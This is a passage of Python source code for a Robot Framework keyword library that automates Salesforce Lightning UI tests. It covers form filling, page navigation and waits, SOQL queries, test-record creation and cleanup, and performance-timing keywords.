def click_related_list_button(self, heading, button_title):
"""Clicks a button in the heading of a related list.
Waits for a modal to open after clicking the button.
"""
self.load_related_list(heading)
locator = lex_locators["record"]["related"]["button"].format(
heading, button_title
)
self._jsclick(locator)
self.wait_until_modal_is_open()
@capture_screenshot_on_error
def click_related_item_link(self, heading, title):
"""Clicks a link in the related list with the specified heading.
This keyword will automatically call *Wait until loading is complete*.
"""
self.load_related_list(heading)
locator = lex_locators["record"]["related"]["link"].format(heading, title)
try:
self._jsclick(locator)
except Exception as e:
self.builtin.log(f"Exception: {e}", "DEBUG")
raise Exception(
f"Unable to find related link under heading '{heading}' with the text '{title}'"
)
self.wait_until_loading_is_complete()
def click_related_item_popup_link(self, heading, title, link):
"""Clicks a link in the popup menu for a related list item.
heading specifies the name of the list,
title specifies the name of the item,
and link specifies the name of the link
"""
self.load_related_list(heading)
locator = lex_locators["record"]["related"]["popup_trigger"].format(
heading, title
)
self.selenium.wait_until_page_contains_element(locator)
self._jsclick(locator)
locator = lex_locators["popup"]["link"].format(link)
self._jsclick(locator)
self.wait_until_loading_is_complete()
def close_modal(self):
"""Closes the open modal"""
locator = lex_locators["modal"]["close"]
self._jsclick(locator)
def current_app_should_be(self, app_name):
"""Validates the currently selected Salesforce App"""
locator = lex_locators["app_launcher"]["current_app"].format(app_name)
elem = self.selenium.get_webelement(locator)
assert app_name == elem.text, "Expected app to be {} but found {}".format(
app_name, elem.text
)
def delete_session_records(self):
"""Deletes records that were created while running this test case.
(Only records specifically recorded using the Store Session Record
keyword are deleted.)
"""
self._session_records.reverse()
self.builtin.log("Deleting {} records".format(len(self._session_records)))
for record in self._session_records[:]:
self.builtin.log(" Deleting {type} {id}".format(**record))
try:
self.salesforce_delete(record["type"], record["id"])
except SalesforceResourceNotFound:
self.builtin.log(" {type} {id} is already deleted".format(**record))
except Exception as e:
self.builtin.log(
" {type} {id} could not be deleted:".format(**record),
level="WARN",
)
self.builtin.log(" {}".format(e), level="WARN")
def get_active_browser_ids(self):
"""Return the id of all open browser ids"""
# This relies on some private data structures, but presently
# there is no other way. There's been a discussion in the
# robot slack channels about adding a new keyword that does
# what this keyword does. When that happens, we can remove
# this keyword.
driver_ids = []
try:
driver_cache = self.selenium._drivers
except NoOpenBrowser:
return []
for index, driver in enumerate(driver_cache._connections):
if driver not in driver_cache._closed:
# SeleniumLibrary driver ids start at one rather than zero
driver_ids.append(index + 1)
return driver_ids
def get_current_record_id(self):
"""Parses the current url to get the object id of the current record.
Expects url format like: [a-zA-Z0-9]{15,18}
"""
url = self.selenium.get_location()
for part in url.split("/"):
oid_match = re.match(OID_REGEX, part)
if oid_match is not None:
return oid_match.group(2)
raise AssertionError("Could not parse record id from url: {}".format(url))
def field_value_should_be(self, label, expected_value):
"""Verify that the form field for the given label is the expected value
Example:
| Field value should be Account Name ACME Labs
"""
value = self.get_field_value(label)
self.builtin.should_be_equal(value, expected_value)
def get_field_value(self, label):
"""Return the current value of a form field based on the field label"""
api_version = int(float(self.get_latest_api_version()))
locator = self._get_input_field_locator(label)
if api_version >= 51:
# this works for both First Name (input) and Account Name (picklist)
value = self.selenium.get_value(locator)
else:
# older releases it's a bit more complex
element = self.selenium.get_webelement(locator)
if element.get_attribute("role") == "combobox":
value = self.selenium.get_text(f"sf:object.field_lookup_value:{label}")
else:
value = self.selenium.get_value(f"sf:object.field:{label}")
return value
def get_locator(self, path, *args, **kwargs):
"""Returns a rendered locator string from the Salesforce lex_locators
dictionary. This can be useful if you want to use an element in
a different way than the built in keywords allow.
"""
locator = lex_locators
for key in path.split("."):
locator = locator[key]
return locator.format(*args, **kwargs)
def get_record_type_id(self, obj_type, developer_name):
"""Returns the Record Type Id for a record type name"""
soql = "SELECT Id FROM RecordType WHERE SObjectType='{}' and DeveloperName='{}'".format(
obj_type, developer_name
)
res = self.cumulusci.sf.query_all(soql)
return res["records"][0]["Id"]
def get_related_list_count(self, heading):
"""Returns the number of items indicated for a related list."""
locator = lex_locators["record"]["related"]["count"].format(heading)
count = self.selenium.get_webelement(locator).text
count = count.replace("(", "").replace(")", "")
return int(count)
def go_to_object_home(self, obj_name):
"""Navigates to the Home view of a Salesforce Object"""
url = self.cumulusci.org.lightning_base_url
url = "{}/lightning/o/{}/home".format(url, obj_name)
self.selenium.go_to(url)
self.wait_until_loading_is_complete(lex_locators["actions"])
def go_to_object_list(self, obj_name, filter_name=None):
"""Navigates to the Home view of a Salesforce Object"""
url = self.cumulusci.org.lightning_base_url
url = "{}/lightning/o/{}/list".format(url, obj_name)
if filter_name:
url += "?filterName={}".format(filter_name)
self.selenium.go_to(url)
self.wait_until_loading_is_complete(lex_locators["actions"])
def go_to_record_home(self, obj_id):
"""Navigates to the Home view of a Salesforce Object"""
url = self.cumulusci.org.lightning_base_url
url = "{}/lightning/r/{}/view".format(url, obj_id)
self.selenium.go_to(url)
self.wait_until_loading_is_complete(lex_locators["actions"])
def go_to_setup_home(self):
"""Navigates to the Home tab of Salesforce Setup"""
url = self.cumulusci.org.lightning_base_url
self.selenium.go_to(url + "/lightning/setup/SetupOneHome/home")
self.wait_until_loading_is_complete()
def go_to_setup_object_manager(self):
"""Navigates to the Object Manager tab of Salesforce Setup"""
url = self.cumulusci.org.lightning_base_url
self.selenium.go_to(url + "/lightning/setup/ObjectManager/home")
self.wait_until_loading_is_complete()
def header_field_should_have_value(self, label):
"""Validates that a field in the record header has a text value.
NOTE: Use other keywords for non-string value types
"""
locator = lex_locators["record"]["header"]["field_value"].format(label)
self.selenium.page_should_contain_element(locator)
def header_field_should_not_have_value(self, label):
"""Validates that a field in the record header does not have a value.
NOTE: Use other keywords for non-string value types
"""
locator = lex_locators["record"]["header"]["field_value"].format(label)
self.selenium.page_should_not_contain_element(locator)
def header_field_should_have_link(self, label):
"""Validates that a field in the record header has a link as its value"""
locator = lex_locators["record"]["header"]["field_value_link"].format(label)
self.selenium.page_should_contain_element(locator)
def header_field_should_not_have_link(self, label):
"""Validates that a field in the record header does not have a link as its value"""
locator = lex_locators["record"]["header"]["field_value_link"].format(label)
self.selenium.page_should_not_contain_element(locator)
def click_header_field_link(self, label):
"""Clicks a link in record header."""
locator = lex_locators["record"]["header"]["field_value_link"].format(label)
self._jsclick(locator)
def header_field_should_be_checked(self, label):
"""Validates that a checkbox field in the record header is checked"""
locator = lex_locators["record"]["header"]["field_value_checked"].format(label)
self.selenium.page_should_contain_element(locator)
def header_field_should_be_unchecked(self, label):
"""Validates that a checkbox field in the record header is unchecked"""
locator = lex_locators["record"]["header"]["field_value_unchecked"].format(
label
)
self.selenium.page_should_contain_element(locator)
def log_browser_capabilities(self, loglevel="INFO"):
"""Logs all of the browser capabilities as reported by selenium"""
output = "selenium browser capabilities:\n"
output += pformat(self.selenium.driver.capabilities, indent=4)
self.builtin.log(output, level=loglevel)
@capture_screenshot_on_error
def open_app_launcher(self, retry=True):
"""Opens the Saleforce App Launcher Modal
Note: starting with Spring '20 the app launcher button opens a
menu rather than a modal. To maintain backwards compatibility,
this keyword will continue to open the modal rather than the
menu. If you need to interact with the app launcher menu, you
will need to create a custom keyword.
If the retry parameter is true, the keyword will
close and then re-open the app launcher if it times out
while waiting for the dialog to open.
"""
self._jsclick("sf:app_launcher.button")
self.selenium.wait_until_element_is_visible("sf:app_launcher.view_all")
self._jsclick("sf:app_launcher.view_all")
self.wait_until_modal_is_open()
try:
# the modal may be open, but not yet fully rendered
# wait until at least one link appears. We've seen that sometimes
# the dialog hangs prior to any links showing up
self.selenium.wait_until_element_is_visible(
"xpath://ul[contains(@class, 'al-modal-list')]//li"
)
except Exception as e:
# This should never happen, yet it does. Experience has
# shown that sometimes (at least in spring '20) the modal
# never renders. Refreshing the modal seems to fix it.
if retry:
self.builtin.log(
f"caught exception {e} waiting for app launcher; retrying", "DEBUG"
)
self.selenium.press_keys("sf:modal.is_open", "ESCAPE")
self.wait_until_modal_is_closed()
self.open_app_launcher(retry=False)
else:
self.builtin.log(
"caught exception waiting for app launcher; not retrying", "DEBUG"
)
raise
def populate_field(self, name, value):
"""Enters a value into an input or textarea field.
'name' represents the label on the page (eg: "First Name"),
and 'value' is the new value.
Any existing value will be replaced.
"""
locator = self._get_input_field_locator(name)
self._populate_field(locator, value)
def populate_lookup_field(self, name, value):
"""Enters a value into a lookup field."""
input_locator = self._get_input_field_locator(name)
menu_locator = lex_locators["object"]["field_lookup_link"].format(value)
self._populate_field(input_locator, value)
for x in range(3):
self.wait_for_aura()
try:
self.selenium.get_webelement(menu_locator)
except ElementNotFound:
# Give indexing a chance to catch up
time.sleep(2)
field = self.selenium.get_webelement(input_locator)
field.send_keys(Keys.BACK_SPACE)
else:
break
self.selenium.set_focus_to_element(menu_locator)
self._jsclick(menu_locator)
self.wait_for_aura()
def _get_input_field_locator(self, name):
"""Given an input field label, return a locator for the related input field
This looks for a <label> element with the given text, or
a label with a span with the given text. The value of the
'for' attribute is then extracted from the label and used
to create a new locator with that id.
For example, the locator 'abc123' will be returned
for the following html:
<label for='abc123'>First Name</label>
-or-
<label for='abc123'><span>First Name</span>
"""
try:
# we need to make sure that if a modal is open, we only find
# the input element inside the modal. Otherwise it's possible
# that the xpath could pick the wrong element.
self.selenium.get_webelement(lex_locators["modal"]["is_open"])
modal_prefix = "//div[contains(@class, 'modal-container')]"
except ElementNotFound:
modal_prefix = ""
locator = modal_prefix + lex_locators["object"]["field_label"].format(
name, name
)
input_element_id = self.selenium.get_element_attribute(locator, "for")
return input_element_id
def _populate_field(self, locator, value):
self.builtin.log(f"value: {value}' locator: '{locator}'", "DEBUG")
field = self.selenium.get_webelement(locator)
self._focus(field)
if field.get_attribute("value"):
self._clear(field)
field.send_keys(value)
def _focus(self, element):
"""Set focus to an element
In addition to merely setting the focus, we click the mouse
to the field in case there are functions tied to that event.
"""
actions = ActionChains(self.selenium.driver)
actions.move_to_element(element).click().perform()
self.selenium.set_focus_to_element(element)
def _clear(self, element):
"""Clear the field, using any means necessary
This is surprisingly hard to do with a generic solution. Some
methods work for some components and/or on some browsers but
not others. Therefore, several techniques are employed.
"""
element.clear()
self.selenium.driver.execute_script("arguments[0].value = '';", element)
# Select all and delete just in case the element didn't get cleared
element.send_keys(Keys.HOME + Keys.SHIFT + Keys.END)
element.send_keys(Keys.BACKSPACE)
if element.get_attribute("value"):
# Give the UI a chance to settle down. The sleep appears
# necessary. Without it, this keyword sometimes fails to work
# properly. With it, I was able to run 700+ tests without a single
# failure.
time.sleep(0.25)
# Even after all that, some elements refuse to be cleared out.
# I'm looking at you, currency fields on Firefox.
if element.get_attribute("value"):
self._force_clear(element)
def _force_clear(self, element):
"""Use brute-force to clear an element
This moves the cursor to the end of the input field and
then issues a series of backspace keys to delete the data
in the field.
"""
value = element.get_attribute("value")
actions = ActionChains(self.selenium.driver)
actions.move_to_element(element).click().send_keys(Keys.END)
for character in value:
actions.send_keys(Keys.BACKSPACE)
actions.perform()
def populate_form(self, **kwargs):
"""Enters multiple values from a mapping into form fields."""
for name, value in kwargs.items():
self.populate_field(name, value)
def remove_session_record(self, obj_type, obj_id):
"""Remove a record from the list of records that should be automatically removed."""
try:
self._session_records.remove({"type": obj_type, "id": obj_id})
except ValueError:
self.builtin.log(
"Did not find record {} {} in the session records list".format(
obj_type, obj_id
)
)
def select_record_type(self, label):
"""Selects a record type while adding an object."""
self.wait_until_modal_is_open()
locator = lex_locators["object"]["record_type_option"].format(label)
self._jsclick(locator)
self.selenium.click_button("Next")
@capture_screenshot_on_error
def select_app_launcher_app(self, app_name):
"""Navigates to a Salesforce App via the App Launcher"""
locator = lex_locators["app_launcher"]["app_link"].format(app_name)
self.open_app_launcher()
self.selenium.wait_until_page_contains_element(locator, timeout=30)
self.selenium.set_focus_to_element(locator)
elem = self.selenium.get_webelement(locator)
link = elem.find_element_by_xpath("../../..")
self.selenium.set_focus_to_element(link)
link.click()
self.wait_until_modal_is_closed()
@capture_screenshot_on_error
def select_app_launcher_tab(self, tab_name):
"""Navigates to a tab via the App Launcher"""
locator = lex_locators["app_launcher"]["tab_link"].format(tab_name)
self.open_app_launcher()
self.selenium.wait_until_page_contains_element(locator)
self.selenium.set_focus_to_element(locator)
self._jsclick(locator)
self.wait_until_modal_is_closed()
def salesforce_delete(self, obj_name, obj_id):
"""Deletes a Salesforce object by object name and Id.
Example:
The following example assumes that ``${contact id}`` has been
previously set. The example deletes the Contact with that Id.
| Salesforce Delete Contact ${contact id}
"""
self.builtin.log("Deleting {} with Id {}".format(obj_name, obj_id))
obj_class = getattr(self.cumulusci.sf, obj_name)
obj_class.delete(obj_id)
self.remove_session_record(obj_name, obj_id)
def salesforce_get(self, obj_name, obj_id):
"""Gets a Salesforce object by Id and returns the result as a dict.
Example:
The following example assumes that ``${contact id}`` has been
previously set. The example retrieves the Contact object with
that Id and then logs the Name field.
| &{contact}= Salesforce Get Contact ${contact id}
| log Contact name: ${contact['Name']}
"""
self.builtin.log(f"Getting {obj_name} with Id {obj_id}")
obj_class = getattr(self.cumulusci.sf, obj_name)
return obj_class.get(obj_id)
def salesforce_insert(self, obj_name, **kwargs):
"""Creates a new Salesforce object and returns the Id.
The fields of the object may be defined with keyword arguments
where the keyword name is the same as the field name.
The object name and Id is passed to the *Store Session
Record* keyword, and will be deleted when the keyword
*Delete Session Records* is called.
As a best practice, either *Delete Session Records* or
*Delete Records and Close Browser* from Salesforce.robot
should be called as a suite teardown.
Example:
The following example creates a new Contact with the
first name of "Eleanor" and the last name of "Rigby".
| ${contact id}= Salesforce Insert Contact
| ... FirstName=Eleanor
| ... LastName=Rigby
"""
self.builtin.log("Inserting {} with values {}".format(obj_name, kwargs))
obj_class = getattr(self.cumulusci.sf, obj_name)
res = obj_class.create(kwargs)
self.store_session_record(obj_name, res["id"])
return res["id"]
def _salesforce_generate_object(self, obj_name, **fields):
obj = {"attributes": {"type": obj_name}} # Object type to create
obj.update(fields)
return obj
def generate_test_data(self, obj_name, number_to_create, **fields):
"""Generate bulk test data
This returns an array of dictionaries with template-formatted
arguments which can be passed to the *Salesforce Collection Insert*
keyword.
You can use ``{{number}}`` to represent the unique index of
the row in the list of rows. If the entire string consists of
a number, Salesforce API will treat the value as a number.
Example:
The following example creates three new Contacts:
| @{objects} = Generate Test Data Contact 3
| ... Name=User {{number}}
| ... Age={{number}}
The example code will generate Contact objects with these fields:
| [{'Name': 'User 0', 'Age': '0'},
| {'Name': 'User 1', 'Age': '1'},
| {'Name': 'User 2', 'Age': '2'}]
Python Expression Syntax is allowed so computed templates like this are also allowed: ``{{1000 + number}}``
Python operators can be used, but no functions or variables are provided, so mostly you just
have access to mathematical and logical operators. The Python operators are described here:
https://www.digitalocean.com/community/tutorials/how-to-do-math-in-python-3-with-operators
Contact the CCI team if you have a use-case that
could benefit from more expression language power.
Templates can also be based on faker patterns like those described here:
https://faker.readthedocs.io/en/master/providers.html
Most examples can be pasted into templates verbatim:
| @{objects}= Generate Test Data Contact 200
| ... Name={{fake.first_name}} {{fake.last_name}}
| ... MailingStreet={{fake.street_address}}
| ... MailingCity=New York
| ... MailingState=NY
| ... MailingPostalCode=12345
| ... Email={{fake.email(domain="salesforce.com")}}
"""
objs = []
for i in range(int(number_to_create)):
formatted_fields = {
name: format_str(value, {"number": i}) for name, value in fields.items()
}
newobj = self._salesforce_generate_object(obj_name, **formatted_fields)
objs.append(newobj)
return objs
def salesforce_collection_insert(self, objects):
"""Inserts records that were created with *Generate Test Data*.
_objects_ is a list of data, typically generated by the
*Generate Test Data* keyword.
A 200 record limit is enforced by the Salesforce APIs.
The object name and Id is passed to the *Store Session
Record* keyword, and will be deleted when the keyword *Delete
Session Records* is called.
As a best practice, either *Delete Session Records* or
**Delete Records and Close Browser* from Salesforce.robot
should be called as a suite teardown.
Example:
| @{objects}= Generate Test Data Contact 200
| ... FirstName=User {{number}}
| ... LastName={{fake.last_name}}
| Salesforce Collection Insert ${objects}
"""
assert (
not obj.get("id", None) for obj in objects
), "Insertable objects should not have IDs"
assert len(objects) <= SF_COLLECTION_INSERTION_LIMIT, (
"Cannot insert more than %s objects with this keyword"
% SF_COLLECTION_INSERTION_LIMIT
)
records = self.cumulusci.sf.restful(
"composite/sobjects",
method="POST",
json={"allOrNone": True, "records": objects},
)
for idx, (record, obj) in enumerate(zip(records, objects)):
if record["errors"]:
raise AssertionError(
"Error on Object {idx}: {record} : {obj}".format(**vars())
)
self.store_session_record(obj["attributes"]["type"], record["id"])
obj["id"] = record["id"]
obj[STATUS_KEY] = record
return objects
def salesforce_collection_update(self, objects):
"""Updates records described as Robot/Python dictionaries.
_objects_ is a dictionary of data in the format returned
by the *Salesforce Collection Insert* keyword.
A 200 record limit is enforced by the Salesforce APIs.
Example:
The following example creates ten accounts and then updates
the Rating from "Cold" to "Hot"
| ${data}= Generate Test Data Account 10
| ... Name=Account #{{number}}
| ... Rating=Cold
| ${accounts}= Salesforce Collection Insert ${data}
|
| FOR ${account} IN @{accounts}
| Set to dictionary ${account} Rating Hot
| END
| Salesforce Collection Update ${accounts}
"""
for obj in objects:
assert obj[
"id"
], "Should be a list of objects with Ids returned by Salesforce Collection Insert"
if STATUS_KEY in obj:
del obj[STATUS_KEY]
assert len(objects) <= SF_COLLECTION_INSERTION_LIMIT, (
"Cannot update more than %s objects with this keyword"
% SF_COLLECTION_INSERTION_LIMIT
)
records = self.cumulusci.sf.restful(
"composite/sobjects",
method="PATCH",
json={"allOrNone": True, "records": objects},
)
for record, obj in zip(records, objects):
obj[STATUS_KEY] = record
for idx, (record, obj) in enumerate(zip(records, objects)):
if record["errors"]:
raise AssertionError(
"Error on Object {idx}: {record} : {obj}".format(**vars())
)
def salesforce_query(self, obj_name, **kwargs):
"""Constructs and runs a simple SOQL query and returns a list of dictionaries.
By default the results will only contain object Ids. You can
specify a SOQL SELECT clause via keyword arguments by passing
a comma-separated list of fields with the ``select`` keyword
argument.
You can supply keys and values to match against
in keyword arguments, or a full SOQL where-clause
in a keyword argument named ``where``. If you supply
both, they will be combined with a SOQL "AND".
``order_by`` and ``limit`` keyword arguments are also
supported as shown below.
Examples:
The following example searches for all Contacts where the
first name is "Eleanor". It returns the "Name" and "Id"
fields and logs them to the robot report:
| @{records}= Salesforce Query Contact select=Id,Name
| ... FirstName=Eleanor
| FOR ${record} IN @{records}
| log Name: ${record['Name']} Id: ${record['Id']}
| END
Or with a WHERE-clause, we can look for the last contact where
the first name is NOT Eleanor.
| @{records}= Salesforce Query Contact select=Id,Name
| ... where=FirstName!='Eleanor'
| ... order_by=LastName desc
| ... limit=1
"""
query = self._soql_query_builder(obj_name, **kwargs)
self.builtin.log("Running SOQL Query: {}".format(query))
return self.cumulusci.sf.query_all(query).get("records", [])
def _soql_query_builder(
self, obj_name, select=None, order_by=None, limit=None, where=None, **kwargs
):
query = "SELECT "
if select:
query += select
else:
query += "Id"
query += " FROM {}".format(obj_name)
where_clauses = []
if where:
where_clauses = [where]
for key, value in kwargs.items():
where_clauses.append("{} = '{}'".format(key, value))
if where_clauses:
query += " WHERE " + " AND ".join(where_clauses)
if order_by:
query += " ORDER BY " + order_by
if limit:
assert int(limit), "Limit should be an integer"
query += f" LIMIT {limit}"
return query
def salesforce_update(self, obj_name, obj_id, **kwargs):
"""Updates a Salesforce object by Id.
The keyword returns the result from the underlying
simple_salesforce ``insert`` method, which is an HTTP
status code. As with `Salesforce Insert`, field values
are specified as keyword arguments.
The following example assumes that ${contact id} has been
previously set, and adds a Description to the given
contact.
| &{contact}= Salesforce Update Contact ${contact id}
| ... Description=This Contact created during a test
| Should be equal as numbers ${result} 204
"""
self.builtin.log(
"Updating {} {} with values {}".format(obj_name, obj_id, kwargs)
)
obj_class = getattr(self.cumulusci.sf, obj_name)
return obj_class.update(obj_id, kwargs)
def soql_query(self, query):
"""Runs a simple SOQL query and returns the dict results
The _query_ parameter must be a properly quoted SOQL query statement. The
return value is a dictionary. The dictionary contains the keys
as documented for the raw API call. The most useful key is ``records``,
which contains a list of records which were matched by the query.
Example
The following example searches for all Contacts with a first
name of "Eleanor" and a last name of "Rigby", and then prints
the name of the first record found.
| ${result}= SOQL Query
| ... SELECT Name, Id FROM Contact WHERE FirstName='Eleanor' AND LastName='Rigby'
| Run keyword if len($result['records']) == 0 Fail No records found
|
| ${contact}= Get from list ${result['records']} 0
| Should be equal ${contact['Name']} Eleanor Rigby
"""
self.builtin.log("Running SOQL Query: {}".format(query))
return self.cumulusci.sf.query_all(query)
def store_session_record(self, obj_type, obj_id):
"""Stores a Salesforce record's Id for use in the *Delete Session Records* keyword.
This keyword is automatically called by *Salesforce Insert*.
"""
self.builtin.log("Storing {} {} to session records".format(obj_type, obj_id))
self._session_records.append({"type": obj_type, "id": obj_id})
@capture_screenshot_on_error
def wait_until_modal_is_open(self):
"""Wait for modal to open"""
self.selenium.wait_until_page_contains_element(
lex_locators["modal"]["is_open"],
timeout=15,
error="Expected to see a modal window, but didn't",
)
def wait_until_modal_is_closed(self):
"""Wait for modal to close"""
self.selenium.wait_until_page_does_not_contain_element(
lex_locators["modal"]["is_open"], timeout=15
)
def wait_until_loading_is_complete(self, locator=None):
"""Wait for LEX page to load.
(We're actually waiting for the actions ribbon to appear.)
"""
locator = lex_locators["body"] if locator is None else locator
try:
self.selenium.wait_until_page_contains_element(locator)
self.wait_for_aura()
# this knowledge article recommends waiting a second. I don't
# like it, but it seems to help. We should do a wait instead,
# but I can't figure out what to wait on.
# https://help.salesforce.com/articleView?id=000352057&language=en_US&mode=1&type=1
time.sleep(1)
except Exception:
try:
self.selenium.capture_page_screenshot()
except Exception as e:
self.builtin.warn("unable to capture screenshot: {}".format(str(e)))
raise
@capture_screenshot_on_error
def wait_until_salesforce_is_ready(self, locator=None, timeout=None, interval=5):
"""Waits until we are able to render the initial salesforce landing page
It will continue to refresh the page until we land on a
lightning page or until a timeout has been reached. The
timeout can be specified in any time string supported by robot
(eg: number of seconds, "3 minutes", etc.). If not specified,
the default selenium timeout will be used.
This keyword will wait a few seconds between each refresh, as
well as wait after each refresh for the page to fully render
(ie: it calls wait_for_aura())
"""
# Note: we can't just ask selenium to wait for an element,
# because the org might not be availble due to infrastructure
# issues (eg: the domain not being propagated). In such a case
# the element will never come. Instead, what we need to do is
# repeatedly refresh the page until the org responds.
#
# This assumes that any lightning page is a valid stopping
# point. If salesforce starts rendering error pages with
# lightning, or an org's default home page is not a lightning
# page, we may have to rethink that strategy.
interval = 5 # seconds between each refresh.
timeout = timeout if timeout else self.selenium.get_selenium_timeout()
timeout_seconds = timestr_to_secs(timeout)
start_time = time.time()
login_url = self.cumulusci.login_url()
locator = lex_locators["body"] if locator is None else locator
while True:
try:
self.selenium.wait_for_condition(
"return (document.readyState == 'complete')"
)
self.wait_for_aura()
# If the following doesn't throw an error, we're good to go.
self.selenium.get_webelement(locator)
break
except Exception as e:
self.builtin.log(
"caught exception while waiting: {}".format(str(e)), "DEBUG"
)
if time.time() - start_time > timeout_seconds:
self.selenium.log_location()
raise Exception("Timed out waiting for a lightning page")
# known edge cases that can be worked around
if self._check_for_login_failure():
continue
elif self._check_for_classic():
continue
# not a known edge case; take a deep breath and
# try again.
time.sleep(interval)
self.selenium.go_to(login_url)
def breakpoint(self):
"""Serves as a breakpoint for the robot debugger
Note: this keyword is a no-op unless the debug option for
the task has been set to True. Unless the option has been
set, this keyword will have no effect on a running test.
"""
return None
def _check_for_classic(self):
"""Switch to lightning if we land on a classic page
This seems to happen randomly, causing tests to fail
catastrophically. The idea is to detect such a case and
auto-click the "switch to lightning" link
"""
try:
# we don't actually want to wait here, but if we don't
# explicitly wait, we'll implicitly wait longer than
# necessary. This needs to be a quick-ish check.
self.selenium.wait_until_element_is_visible(
"class:switch-to-lightning", timeout=2
)
self.builtin.log(
"It appears we are on a classic page; attempting to switch to lightning",
"WARN",
)
# this screenshot should be removed at some point,
# but for now I want to make sure we see what the
# page looks like if we get here.
self.selenium.capture_page_screenshot()
# just in case there's a modal present we'll try simulating
# the escape key. Then, click on the switch-to-lightning link
self.selenium.press_keys(None, "ESC")
self.builtin.sleep("1 second")
self.selenium.click_link("class:switch-to-lightning")
return True
except (NoSuchElementException, AssertionError):
return False
def _check_for_login_failure(self):
"""Handle the case where we land on a login screen
Sometimes we get redirected to a login URL rather than
being logged in, and we've yet to figure out precisely why
that happens. Experimentation shows that authentication has
already happened, so in this case we'll try going back to
the instance url rather than the front door servlet.
Admittedly, this is a bit of a hack, but it's better than
never getting past this redirect.
"""
location = self.selenium.get_location()
if "//test.salesforce.com" in location or "//login.salesforce.com" in location:
login_url = self.cumulusci.org.config["instance_url"]
self.builtin.log(f"setting login_url temporarily to {login_url}", "DEBUG")
self.selenium.go_to(login_url)
return True
return False
def elapsed_time_for_last_record(
self, obj_name, start_field, end_field, order_by, **kwargs
):
"""For records representing jobs or processes, compare the record's start-time to its end-time to see how long a process took.
Arguments:
obj_name: SObject to look for last record
start_field: Name of the datetime field that represents the process start
end_field: Name of the datetime field that represents the process end
order_by: Field name to order by. Should be a datetime field, and usually is just the same as end_field.
where: Optional Where-clause to use for filtering
Other keywords are used for filtering as in the Salesforce Query keywordf
The last matching record queried and summarized.
Example:
${time_in_seconds} = Elapsed Time For Last Record
... obj_name=AsyncApexJob
... where=ApexClass.Name='BlahBlah'
... start_field=CreatedDate
... end_field=CompletedDate
... order_by=CompletedDate
"""
if len(order_by.split()) != 1:
raise Exception("order_by should be a simple field name")
query = self._soql_query_builder(
obj_name,
select=f"{start_field}, {end_field}",
order_by=order_by + " DESC NULLS LAST",
limit=1,
**kwargs,
)
response = self.soql_query(query)
results = response["records"]
if results:
record = results[0]
return _duration(record[start_field], record[end_field], record)
else:
raise Exception(f"Matching record not found: {query}")
def start_performance_timer(self):
"""Start an elapsed time stopwatch for performance tests.
See the docummentation for **Stop Performance Timer** for more
information.
Example:
Start Performance Timer
Do Something
Stop Performance Timer
"""
BuiltIn().set_test_variable("${__start_time}", datetime.now())
def stop_performance_timer(self):
"""Record the results of a stopwatch. For perf testing.
This keyword uses Set Test Elapsed Time internally and therefore
outputs in all of the ways described there.
Example:
Start Performance Timer
Do Something
Stop Performance Timer
"""
builtins = BuiltIn()
start_time = builtins.get_variable_value("${__start_time}")
if start_time:
seconds = (datetime.now() - start_time).seconds
assert seconds is not None
self.set_test_elapsed_time(seconds)
else:
raise Exception(
"Elapsed time clock was not started. "
"Use the Start Elapsed Time keyword to do so."
)
def set_test_elapsed_time(self, elapsedtime):
"""This keyword captures a computed rather than measured elapsed time for performance tests.
For example, if you were performance testing a Salesforce batch process, you might want to
store the Salesforce-measured elapsed time of the batch process instead of the time measured
in the CCI client process.
The keyword takes a single argument which is either a number of seconds or a Robot time string
(https://robotframework.org/robotframework/latest/libraries/DateTime.html#Time%20formats).
Using this keyword will automatically add the tag cci_metric_elapsed_time to the test case
and ${cci_metric_elapsed_time} to the test's variables. cci_metric_elapsed_time is not
included in Robot's html statistical roll-ups.
Example:
Set Test Elapsed Time 11655.9
Performance test times are output in the CCI logs and are captured in MetaCI instead of the
"total elapsed time" measured by Robot Framework. The Robot "test message" is also updated."""
builtins = BuiltIn()
try:
seconds = float(elapsedtime)
except ValueError:
seconds = timestr_to_secs(elapsedtime)
assert seconds is not None
builtins.set_test_message(f"Elapsed time set by test : {seconds}")
builtins.set_tags("cci_metric_elapsed_time")
builtins.set_test_variable("${cci_metric_elapsed_time}", seconds)
def set_test_metric(self, metric: str, value=None):
"""This keyword captures any metric for performance monitoring.
For example: number of queries, rows processed, CPU usage, etc.
The keyword takes a metric name, which can be any string, and a value, which
can be any number.
Using this keyword will automatically add the tag cci_metric to the test case
and ${cci_metric_<metric_name>} to the test's variables. These permit downstream
processing in tools like CCI and MetaCI.
cci_metric is not included in Robot's html statistical roll-ups.
Example:
| Set Test Metric Max_CPU_Percent 30
Performance test metrics are output in the CCI logs, log.html and output.xml.
MetaCI captures them but does not currently have a user interface for displaying
them."""
builtins = BuiltIn()
value = float(value)
builtins.set_tags("cci_metric")
builtins.set_test_variable("${cci_metric_%s}" % metric, value)
@capture_screenshot_on_error
def input_form_data(self, *args):
"""Fill in one or more labeled input fields fields with data
Arguments should be pairs of field labels and values. Labels
for required fields should not include the asterisk. Labels
must be exact, including case.
This keyword uses the keyword *Locate Element by Label* to
locate elements. More details about how elements are found are
in the documentation for that keyword.
For most input form fields the actual value string will be
used. For a checkbox, passing the value "checked" will check
the checkbox and any other value will uncheck it. Using
"unchecked" is recommended for clarity.
Example:
| Input form data
| ... Opportunity Name The big one # required text field
| ... Amount 1b # currency field
| ... Close Date 4/01/2022 # date field
| ... Private checked # checkbox
| ... Type New Customer # combobox
| ... Primary Campaign Source The Big Campaign # picklist
This keyword will eventually replace the "populate form"
keyword once it has been more thoroughly tested in production.
"""
it = iter(args)
errors = []
for label, value in list(zip(it, it)):
# this uses our custom "label" locator strategy
locator = f"label:{label}"
# FIXME: we should probably only wait for the first label;
# after that we can assume the fields have been rendered
# so that we fail quickly if we can't find the element
element = self.selenium.get_webelement(locator)
handler = get_form_handler(element, locator)
try:
if handler:
handler.set(value)
else:
raise Exception(
f"No form handler found for tag '{element.tag_name}'"
)
except Exception as e:
errors.append(f"{label}: {str(e)}")
if errors:
message = "There were errors with the following fields:\n"
message += "\n".join(errors)
raise Exception(message)
# FIXME: maybe we should automatically set the focus to some
# other element to trigger any event handlers on the last
# element? But what should we set the focus to?
def locate_element_by_label(self, browser, locator, tag, constraints):
"""Find a lightning component, input, or textarea based on a label
If the component is inside a fieldset, the fieldset label can
be prefixed to the label with a double colon in order to
disambiguate the label. (eg: Other address::First Name)
If the label is inside nested ligntning components (eg:
``<lightning-input>...<lightning-combobox>...<label>``), the
lightning component closest to the label will be
returned (in this case, ``lightning-combobox``).
If a lightning component cannot be found for the label, an
